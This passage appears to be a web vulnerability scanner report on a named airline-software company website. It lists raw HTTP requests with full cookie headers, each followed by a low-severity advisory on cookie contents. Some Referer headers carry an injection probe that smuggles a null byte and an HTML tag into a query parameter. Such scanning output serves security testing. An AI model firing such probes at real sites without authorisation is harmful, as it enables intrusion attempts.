GET /home/news_events/event/sabresonic_global_conference2 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events?%0048092<a>12e2bef5c79=1 Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/events HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/events/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events?%0048092<a>12e2bef5c79=1 Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/news HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/news_events/news/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events?%0048092<a>12e2bef5c79=1 Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321174; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321213; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/agency_management HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/agency_management/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322583; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/agent_sales_report HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/agent_sales_report/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322592; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/airline_reservations/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/customer_sales_service/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322289; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A3%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/airline_reservations/downloads/images/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/airline_reservations/ecommerce/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322289; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A3%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/airline_reservations/sabresonic_technology/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323017; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/airports HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322211; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A2%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/automated_exchange_and_refunds HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/automated_exchange_and_refunds/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322596; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fcorporate_management%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_fares_manager%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/commercial_planning/images HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/images/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323199; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fcommercial_planning%2Fimages%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/commercial_planning/my_list/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322977; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/commercial_planning/sabre_airvision_revenue/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322283; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fbusiness_issues%2Frevenue_growth%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproducts_services%2Fservices%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A4%3Bs%3A64%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_flight%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/corporate_management HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/corporate_management/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322591; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_fares_manager%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/credit_suite HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/credit_suite/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322597; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Ffrequent_flyer_management%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_revenue_manager%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_airvision_schedule_manager%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/developer_tool HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/developer_tool/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322600; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A1%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/electronic_ticketing HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/electronic_ticketing/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322597; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fsabresonic_inventory%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fproducts_services%2Fagency_management%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/electronic_ticketing_for_third-party_ground_handling HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/electronic_ticketing_for_third-party_ground_handling/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322597; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A34%3A%22%2Fproducts_services%2Fsabresonic_css%2F%22%3Bi%3A1%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_group_ecommerce%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/complete_the_picture/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321275; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321956; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_web%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_accounting%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/aircentre_technology HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/aircentre_technology/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323070; __utmb=178985382.2.10.1286295079; 